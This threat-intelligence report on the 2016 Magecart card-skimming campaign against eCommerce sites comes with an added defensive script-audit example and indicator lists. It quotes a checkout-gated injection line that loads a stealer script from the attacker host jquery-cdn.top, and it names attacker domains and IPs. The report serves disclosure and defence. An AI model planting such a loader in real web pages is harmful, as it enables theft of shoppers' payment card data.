RiskIQ Research: Compromised eCommerce Sites Lead to Web-Based Keyloggers
Most methods used by attackers to target consumers are commonplace, such as phishing and
the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend
to be rarer and isolated to certain industries. However, some methods are downright
obscure—a recently observed instance of threat actors injecting a keylogger directly into a
website is one of these.
Targeting Consumers Via Retailer Payment Platforms
Since the widely publicized breach of Target Corporation, there has been a significant increase
in awareness of activity surrounding POS (point of sale) system breaches. But web-based
keylogger injection incidents continue to be little-known, even though they have been occurring
for longer than the threats related to many high-profile breaches.
In 2000, the discovery of a vulnerability in versions of the widely-deployed Cart32 software,
which enables consumers to shop online, gave threat actors access to the application as the
administrator so they could dump credit card data and run commands on the hosting server. In
2007, discussions like this in the OSCommerce community illustrated more instances. Later in
2011, analysis showed additional mass compromise activity in OSCommerce pushing online
store visitors to information-stealing malware.
Since then, this kind of activity increased, affecting other popular shopping cart software
implementations.
● https://www.atwix.com/magento/credit-card-numbers-leak/
● http://www.snapfast.com/blog/magento-mage-jpg-hack/
● https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.html
● https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
● https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html
2016 Magecart injections
In 2016, the trend continues. Numerous hacked eCommerce websites appear to be affected by
a new compromise that injects JavaScript code into the site, which allows attackers to capture
payment card information. RiskIQ has observed this campaign ranging back to at least March
2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects
of the activity was shared in June by Sucuri.
RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes.
Through analysis of data in RiskIQ Security Intelligence Services and RiskIQ’s PassiveTotal,
we’ve discovered that, although somewhat similar to other active credit card stealer operations,
Magecart is significant for a few reasons.
1. Affected sites are hosted on multiple eCommerce platforms. At least the following
technologies are explicitly seen to be impacted by this activity:
● Magento Commerce
● Powerfront CMS
● OpenCart
2. Multiple payment services provider linkages are targeted on affected sites as well, including:
● Braintree
● VeriSign payment processing
3. Formgrabber/credit card stealer content is hosted on remote attacker-operated sites, served
over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS.
4. Attackers have refined their malicious content over time, with identified samples in RiskIQ
data showing evidence of:
● Testing and capabilities development
● Increased scope of targeting payment platforms
● Development and testing of enhancements
● Addition of obfuscation to hinder analysis and identification
● Attempts to hide behind brands of commonplace web technologies to blend in on
compromised sites
5. The credit card stealer works in a very similar manner on the compromised web server as a
banking trojan functions on a compromised victim workstation. Code is injected which can
“hook” web forms and access data from form submissions much like a formgrabber. Data is
exfiltrated from the compromised server to a dropzone for attacker collection. There is also
some indication in related payloads that attackers may be injecting bogus form fields into
payment forms to solicit additional data from victims, similar to how webinjects operate when
logged into a banking website from a compromised endpoint.
Further insight on the functionality of the stealers observed in this campaign is available from
ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this
threat activity.
An approximate timeline in observations from analyzed data provides the following insight:
1. March 2016: The domain statsdot.eu was registered, indicating possible early stages of
the immediate Magecart campaign. Injections were simplistic and payloads were largely
unobfuscated.
2. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of
obfuscation. An unusual two-stage form of payload delivery was observed (two domains used
to serve the injection to site visitors). The addition of conditional activation of stealer scripts by
targeted cart URLs (checkout pages, etc.) was observed.
3. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to
AS203624 DATAFLOWSU, a recognized Eastern European “bulletproof hoster” (hosting
and network services provider operated by and catering to cybercriminal interests).
4. September 2016: Additional obfuscated script injections and remotely hosted JS were
observed. At this time, activity is reduced but steady.
How Magecart Works
With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page
contents—including the Document Object Model (DOM), we can illustrate the operation of this
campaign. The following sections present incidents on some affected websites.
www.faber.co.uk
In May 2016, RiskIQ observed the website of Faber and Faber, famed UK book publishing
house, to be serving Magecart injections from their Magento site.
The injection in the source of the site can be seen with a simple addition of a script tag. When
the injected web page on the merchant site is loaded, the malicious keylogger script is also
loaded in the background. The keylogger script can access the browser session and submitted
data.
In this case, the attacker delivers the malicious credit card stealer script in two stages:
1. The injected URL verifies that the page the site visitor is on is a checkout URL where
cardholder data will be entered. In the delivered code, it is visible, for example, that the
Firecheckout extension for Magento is targeted.
2. If the test succeeds, the stealer script is loaded from the second stage script URL:
if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};
The resulting stealer script as served in this incident is shown below:
The basic functionality of this script is to capture data from form fields and send the data to the
remote URL using an AJAX call.
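Added example (not part of the RiskIQ report and not RiskIQ tooling): a site owner's audit of the two-stage delivery described above, which lists script hosts that are not on an allowlist and inspects a retrieved first-stage body for a checkout-gated loader. The page URL shop.example, the first-stage host stage-one.invalid, the allowlist and all function names are constructed for illustration; the first-stage body is the snippet quoted above, and the gating check is a heuristic.

```javascript
// Added example: audit script tags for a two-stage, checkout-gated injection.
// All sample data below is constructed; only the loader snippet is from the report.

const CHECKOUT_WORDS = /onepage|checkout|onestep|firecheckout/i; // keywords in the quoted snippet
const LOCATION_REF = /\b(?:window\.|document\.)?location\b/;
const DOC_WRITE = /document\.write(?:ln)?\s*\(/;

// Collect every <script src=...> URL found in a blob of text, resolved against base.
// Works on HTML and on JavaScript that carries a script tag inside a string.
function scriptSources(text, base) {
  const tagRe = /<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const urls = [];
  let m;
  while ((m = tagRe.exec(text)) !== null) {
    const raw = m[1] ?? m[2] ?? m[3];
    try {
      urls.push(new URL(raw, base).href);
    } catch {
      // src values that do not parse as URLs are skipped
    }
  }
  return urls;
}

// Exact host or true subdomain only. Substring matching would let a lookalike
// such as jquery-cdn.top pass for a jQuery host.
function hostAllowed(host, allowlist) {
  const h = host.toLowerCase();
  return allowlist.some((a) => h === a || h.endsWith('.' + a));
}

// Heuristic check of a retrieved script body: does it test the page location
// against checkout keywords, and does it write further script tags?
function analyzeLoader(jsText, scriptUrl) {
  return {
    gatedOnCheckout: LOCATION_REF.test(jsText) && CHECKOUT_WORDS.test(jsText),
    secondStage: DOC_WRITE.test(jsText) ? scriptSources(jsText, scriptUrl) : [],
  };
}

// fetched maps script URL -> body already retrieved by the auditor (no network here).
function auditPage(pageUrl, html, fetched, allowlist) {
  const allowed = [new URL(pageUrl).hostname, ...allowlist];
  const findings = [];
  for (const src of scriptSources(html, pageUrl)) {
    const host = new URL(src).hostname;
    if (hostAllowed(host, allowed)) continue;
    const finding = { url: src, host, gatedOnCheckout: false, secondStage: [] };
    const body = fetched[src];
    if (body !== undefined) {
      const loader = analyzeLoader(body, src);
      finding.gatedOnCheckout = loader.gatedOnCheckout;
      finding.secondStage = loader.secondStage.filter(
        (u) => !hostAllowed(new URL(u).hostname, allowed)
      );
    }
    findings.push(finding);
  }
  return findings;
}

// ---- Constructed sample input ----
const SAMPLE_PAGE_URL = 'https://shop.example/checkout/onepage/';
const SAMPLE_ALLOWLIST = ['code.jquery.com'];
const SAMPLE_HTML = `
<html><head>
<script type="text/javascript" src="/js/prototype/prototype.js"></script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
<script src="https://stage-one.invalid/loader.js"></script>
</head><body>checkout form</body></html>`;
const SAMPLE_FETCHED = {
  // Body of the first-stage script: the snippet quoted in the report.
  'https://stage-one.invalid/loader.js':
    "if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))" +
    "{document.write('<script src=\"https://jquery-cdn.top/mage.js\"></script>')};",
};

console.log(
  JSON.stringify(
    auditPage(SAMPLE_PAGE_URL, SAMPLE_HTML, SAMPLE_FETCHED, SAMPLE_ALLOWLIST),
    null,
    2
  )
);
```

The first-party and allowlisted scripts produce no finding; the injected tag is reported together with the second-stage URL it would load on checkout pages.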
Looking into the hosting for this attacker infrastructure, we see the following components active
at the time:
mageonline.net 108.61.188.71
jquery-cdn.top 45.32.153.108
45.32.153.108 AS20473 | US | AS-CHOOPA - Choopa LLC
108.61.188.71 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant
name and email):
JQUERY-CDN.TOP 2016-05-09 PDR Ltd bitcoin-dns.hosting Ted 31338@mail.ru
MAGEONLINE.NET 2016-05-16 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM bitcoin-dns.hosting Gregory braun.security@yandex.com
Note
The domain jquery-cdn.top may sound familiar to readers. In 2014 a threat actor
group used the domain jquery-cdn.com in a series of attacks against web sites,
injecting malicious redirects into them to hijack visitor traffic to push victims to an
instance of a crimeware exploit kit.
https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-at-risk/
This was a different attack campaign with different goals but illustrates a common
technique in website hijacking where domain names and similar indicators are chosen
with careful intent to allow attacker modifications and network traffic to blend in and
avoid suspicion by onlookers. The names of popular JavaScript libraries are a common
choice because of their presence on so many websites. A listing of Magecart domains
and sampling of URLs is presented at the end of this report to illustrate how this
concept influenced this attacker’s choice of naming their infrastructure.
A short time later in the month, RiskIQ observed the attack site serving slightly modified
payloads:
We believe this modification indicates work in progress on developing and enhancing the
attacker’s code. You can see that commented sections were added to the file referencing form
fields related to Braintree’s Magento module. Braintree is a payment processing service that
may be snapped into the Magento platform to facilitate payment handling. The addition of this
code may be an indication of development and expansion of cardholder data targeting by the
attacker.
We also note that the bottom of the file contains a call to console.log(), which aids the site
visitor in debugging elements on the page. Verifying the victim eCommerce site, in this case, we
note that the site indeed included Braintree-related JavaScript libraries. Opportunistic attackers
may not always be able to predict the internals of how a compromised website handles details
like payment processing and credit card handling. However, it's likely that upon access to
multiple victim websites, threat actors realized they needed to add additional support for the
variety of services used in the eCommerce space, leading to this on-the-fly development.
www.everlast.com
Later in May, we identified that the main site of clothing/fitness powerhouse Everlast
Worldwide, Inc. was compromised and abused to steal credit card data by the same threat
actors.
As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer
script used the filename everlast.js, which may indicate that the attackers recognized a major
brand at their disposal and took additional steps to attempt to have their malicious code blend in
with site contents. This customization of script names to match victim sites is not common
across much of the analyzed activity.
Like that observed in other reported activity, the stealer code served in this instance is delivered
in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer and we
note that it is used in various capacities by multiple threat actors (observed in malicious website
code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script
library is shown below:
Resolution and domain data in this occurrence:
angular.club 108.61.211.216
108.61.211.216 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
ANGULAR.CLUB 2016-05-15 PDR Ltd. d/b/a PublicDomainRegistry.com bitcoin-dns.hosting Gregory braun.security@yandex.com
shop.guess.net.au
In July, we observed another major fashion/lifestyle brand affected by the Magecart threat. The
GUESS Australia online store was affected, and notably not implemented on Magento but
rather Powerfront CMS.
As shown, the attacker appears to have adapted the name of the stealer script (/mage-asp.js)
to, in part, reflect the technology on the underlying site—Powerfront CMS is implemented in
ASP.
Stealer code:
Significant in this case is that sometime before staging this attack, hosting for the malicious
stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat
activity and noted to be a bulletproof hosting provider, servicing criminal customers on a
dedicated basis.
mage-js.link 80.87.205.143
80.87.205.143 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
MAGE-JS.LINK 2016-06-09 Gandi SAS gandi.net Farid Zeynalov abuse@dataflow.su
www.rebeccaminkoff.com
More recently, on September 19, RiskIQ observed the Magento online store of fashion brand
Rebecca Minkoff (apparel, handbags, more) affected by Magecart.
Stealer code:
js-syst.su 80.87.205.145
80.87.205.145 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
JS-SYST.SU 2016-08-25 REGRU-REG-FID reg.ru - rudneva-y@mail.ua
RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel
category, believed to be in part because of the popularity of eCommerce in this space to extend
storefronts to the Internet.
Conclusion and Guidance
As attackers focus on broadening capabilities to seize revenue opportunities, targets of
cybercrime face an array of threats. eCommerce site owners must take every step necessary to
secure their data and safeguard their payment card information. A bad experience at a retailer
site may mean the loss of revenue as impacted users take their money elsewhere. Because
Magecart affects websites deployed on commodity CMS and eCommerce software technology,
the implementations of which may be outsourced by merchants to third parties, both merchants
and integrators must take active roles in ensuring secure environments for deployed sites. Here
is RiskIQ’s guidance:
● Merchants should partner with integrators and contractors who can be verified to provide
assurances not only of minimum compliance requirements but can also demonstrate
transparency around the technologies they utilize and their processes for hardening
eCommerce installations and maintaining sound security postures. It is important that
merchants do not leave assurance of this as an assumption! Consider specific contract
language focused on these key elements together with SLAs.
● eCommerce site administrators must ensure familiarity and conformance to
recommended security controls and best practices related to eCommerce, and
particularly, the software packages utilized. All operating system software and web stack
software must be kept up to date. It is critical to remain abreast of security advisories
from the software developers and to ensure that appropriate patch application follows,
not only for the core package but also third-party plugins and related components.
Examples of such resources for the Magento CMS include the following:
○ https://magento.com/security
○ https://magento.com/security/best-practices
● Site and system administrators should safeguard credentials used to access admin
interfaces and underlying web hosting environments and passwords should be changed
regularly. Strong authentication schemes should be utilized where available to reduce
the risk from stolen credentials. Multi-factor authentication or two-step verification
options are commonplace and effective for this. Use of cryptographic keys and
authentication tokens for access to remote hosting servers is recommended over
traditional username and password logins.
End users are also at significant risk as it is their payment data that is on the line when
engaging in online sales. We recommend the following considerations for consumers:
● Carefully consider the online retailers whose sites you visit and to whom you submit
payment data. Understand that at any given time, a portion of online retailers are
compromised and present a risk that’s unknown to site owners. Without a high level of
visibility and knowledge about attack techniques, it may be difficult to discern high-risk
sites. Attempt to do business with merchants you believe are trustworthy and go to great
lengths to protect customer data.
● Maintain secure configurations on all computers used to carry out online purchases. Any
system used for online banking or eCommerce must be a known good or trusted
endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual
machines. Public systems and kiosks should be avoided! Operating system and all
application security updates should be up to date. Other security controls may be utilized
to address specific risks, such as antivirus software or other endpoint solutions.
● An effective control that can prevent attacks such as Magecart is the use of web content
whitelisting plugins such as NoScript (for Mozilla’s Firefox). These types of add-ons
function by allowing the end user to specify which websites are “trusted” and preventing
the execution of scripts and other high-risk web content. Using such a tool, the malicious
sites hosting the credit card stealer scripts would not be loaded by the browser,
preventing the script logic from accessing payment card details.
Data and indicators
You can download the indicator files here and here.
Attacker Domains
The following domains are observed serving malicious formgrabber code or are in some way
closely related to observed domains (common hosting or other high-confidence reputational
links). These domains were registered between March and August 2016.
Attacker IP addresses
The following IP addresses are observed hosting formgrabber domains or are in some way
closely related to observed addresses (common hosting or other high-confidence reputational
links). These domains were registered between March and August 2016. These IPs are
provided with associated routing AS data indicating likely provider of hosting or Internet service.
Sample URLs
The following data consists of a set of sample Magecart URLs observed injected into affected
websites, sorted by an observed date of occurrence.
Affected websites
The following data provides a list of affected websites observed to be serving script injections to
known Magecart content hosting and data collection hosts over the observed timeframe. This
information is extracted from RiskIQ crawl sequences and presented in the form of host pairs
through PassiveTotal, our solution for investigators and responders exploring the Digital
Footprints of malicious actors.

Intelligent cyber security solutionsSwapnil Deshmukh
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserguestb1956e
 
IRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET Journal
 
Cyber crime - Understanding the Organised Criminal Group model
Cyber crime -  Understanding the Organised Criminal Group modelCyber crime -  Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group modelInnesGerrard
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Editor IJMTER
 
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET Journal
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?Osei Fortune
 
Smart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemSmart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemIRJET Journal
 

Similar to Compromised e commerce_sites_lead_to_web-based_keyloggers (20)

1 Manic Menagerie Malicious activity target.docx
   1  Manic Menagerie Malicious activity target.docx   1  Manic Menagerie Malicious activity target.docx
1 Manic Menagerie Malicious activity target.docx
 
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
 
IRJET - Chrome Extension for Detecting Phishing Websites
IRJET -  	  Chrome Extension for Detecting Phishing WebsitesIRJET -  	  Chrome Extension for Detecting Phishing Websites
IRJET - Chrome Extension for Detecting Phishing Websites
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper   Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper   Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
 
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern ScriptsTracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
A web content analytics
A web content analyticsA web content analytics
A web content analytics
 
Intelligent cyber security solutions
Intelligent cyber security solutionsIntelligent cyber security solutions
Intelligent cyber security solutions
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browser
 
IRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine Learning
 
Dynamic watermarking
Dynamic watermarkingDynamic watermarking
Dynamic watermarking
 
Cyber crime - Understanding the Organised Criminal Group model
Cyber crime -  Understanding the Organised Criminal Group modelCyber crime -  Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group model
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
 
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?
 
Smart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemSmart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal system
 

More from Andrey Apuhtin

Shadow pad technical_description_pdf
Shadow pad technical_description_pdfShadow pad technical_description_pdf
Shadow pad technical_description_pdfAndrey Apuhtin
 
Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Andrey Apuhtin
 
Hutchins redacted indictment
Hutchins redacted indictmentHutchins redacted indictment
Hutchins redacted indictmentAndrey Apuhtin
 
Dr web review_mob_july_2017
Dr web review_mob_july_2017Dr web review_mob_july_2017
Dr web review_mob_july_2017Andrey Apuhtin
 
Nexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enNexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enAndrey Apuhtin
 
Pandalabs отчет за 1 квартал 2017
Pandalabs   отчет за 1 квартал 2017Pandalabs   отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017Andrey Apuhtin
 
Lookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisLookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisAndrey Apuhtin
 
Apwg trends report_q4_2016
Apwg trends report_q4_2016Apwg trends report_q4_2016
Apwg trends report_q4_2016Andrey Apuhtin
 
News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017Andrey Apuhtin
 
Windows exploitation-2016-a4
Windows exploitation-2016-a4Windows exploitation-2016-a4
Windows exploitation-2016-a4Andrey Apuhtin
 

More from Andrey Apuhtin (20)

Shadow pad technical_description_pdf
Shadow pad technical_description_pdfShadow pad technical_description_pdf
Shadow pad technical_description_pdf
 
Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17
 
Hutchins redacted indictment
Hutchins redacted indictmentHutchins redacted indictment
Hutchins redacted indictment
 
Dr web review_mob_july_2017
Dr web review_mob_july_2017Dr web review_mob_july_2017
Dr web review_mob_july_2017
 
Dmarc
DmarcDmarc
Dmarc
 
Nexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enNexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_en
 
Pandalabs отчет за 1 квартал 2017
Pandalabs   отчет за 1 квартал 2017Pandalabs   отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017
 
Sel03129 usen
Sel03129 usenSel03129 usen
Sel03129 usen
 
Cldap threat-advisory
Cldap threat-advisoryCldap threat-advisory
Cldap threat-advisory
 
Lookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisLookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysis
 
Rand rr1751
Rand rr1751Rand rr1751
Rand rr1751
 
Apwg trends report_q4_2016
Apwg trends report_q4_2016Apwg trends report_q4_2016
Apwg trends report_q4_2016
 
Browser history
Browser historyBrowser history
Browser history
 
Software
SoftwareSoftware
Software
 
Antivirus
AntivirusAntivirus
Antivirus
 
Https interception
Https interceptionHttps interception
Https interception
 
Wilssc 006 xml
Wilssc 006 xmlWilssc 006 xml
Wilssc 006 xml
 
News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017
 
Windows exploitation-2016-a4
Windows exploitation-2016-a4Windows exploitation-2016-a4
Windows exploitation-2016-a4
 
Mw stj 08252016_2
Mw stj 08252016_2Mw stj 08252016_2
Mw stj 08252016_2
 

Recently uploaded

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxnada99848
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 

Recently uploaded (20)

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptx
 
